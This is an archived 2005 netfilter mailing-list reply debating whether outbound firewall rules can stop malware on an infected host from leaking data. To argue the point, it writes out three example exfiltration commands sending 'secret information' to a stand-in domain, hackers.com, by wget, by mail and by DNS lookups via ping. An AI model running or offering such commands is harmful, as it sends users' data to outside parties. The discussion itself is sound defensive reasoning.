From: Frank Gruellich <frank@der-frank.org>
To: netfilter@lists.netfilter.org
Cc: Nick Drage <nickd@metastasis.org.uk>
Subject: Re: Nice ZoneAlarm that might be useful for Iptables
Date: Mon, 20 Jun 2005 07:28:33 +0200 [thread overview]
Message-ID: <20050620052833.GP28123@der-frank.org> (raw)
In-Reply-To: <20050619214142.GN3217@metastasis.org.uk>
* Nick Drage <nickd@metastasis.org.uk> 19. Jun 05:
> On Tue, May 31, 2005 at 06:33:10AM +0200, Frank Gruellich wrote:
> > AFAIK Zonealarm it means, that a program starts a server: it listens on
> > a port. For Unix it needs root priveleges to listen on ports below 1024
> > (dunno about Windows).
> AFAICT any program or user can open a socket on any port if it's not
> already in use.
You're talking about Windows, don't you?
> > While OUTPUT has nothing to do with servers, it is simply impossible.
> > You can't protect an infected host.
> Of course you can.
>
> If the malware doesn't have root, [snip].
The important thing I implied. I wouldn't call it infection if it
doesn't run as root. Then it's just ... broken, messy.
> > How do you intend to catch
> > $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information'
> Use a proxy?
We were talking about local actions, weren't we? A local proxy? Much
effort, isn't it? You have to use a transparent one, you know? Who
decides, that script.php at hackers.com is going to be filtered?
> > $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@hackers.com
> A mail server or Network IDS set to pick up on the terms used in such
> secret information.
A local IDS? Wow! This doesn't sound like a single host system.
> > $ ping -c1 www.this.is.my.very.secret.information.hackers.com
> Stop ICMP ping outbound? Why would that be needed by normal users?
The penetration is not the ICMP but the DNS resolve. hackers.com is a
bad guy's domain running some "special" kind of DNS server. I've seen
shells running this way.
> You can't completely block malware from accessing the Internet, but you
> can make it really, really difficult...
No, it's IMHO not that difficult.
Kind
regards, Frank.
--
Sigmentation fault
next prev parent reply other threads:[~2005-06-20 5:28 UTC|newest]
Thread overview: 15+ messages / expand[flat|nested] mbox.gz Atom feed top
2005-05-31 3:53 Nice ZoneAlarm that might be useful for Iptables Larry Alkoff
2005-05-31 4:33 ` Frank Gruellich
2005-05-31 18:18 ` R. DuFresne
2005-06-01 2:12 ` Feizhou
2005-06-01 2:16 ` Jason Opperisano
2005-06-01 2:37 ` Feizhou
2005-06-19 21:41 ` Nick Drage
2005-06-19 21:49 ` Jan Engelhardt
2005-06-20 5:28 ` Frank Gruellich [this message]
2005-06-20 6:47 ` David Busby
2005-05-31 5:07 ` Taylor, Grant
2005-05-31 6:42 ` Feizhou
2005-05-31 6:44 ` Taylor, Grant
2005-05-31 6:33 ` Eric Leblond
2005-06-19 21:35 ` Nick Drage
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20050620052833.GP28123@der-frank.org \
--to=frank@der-frank.org \
--cc=netfilter@lists.netfilter.org \
--cc=nickd@metastasis.org.uk \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox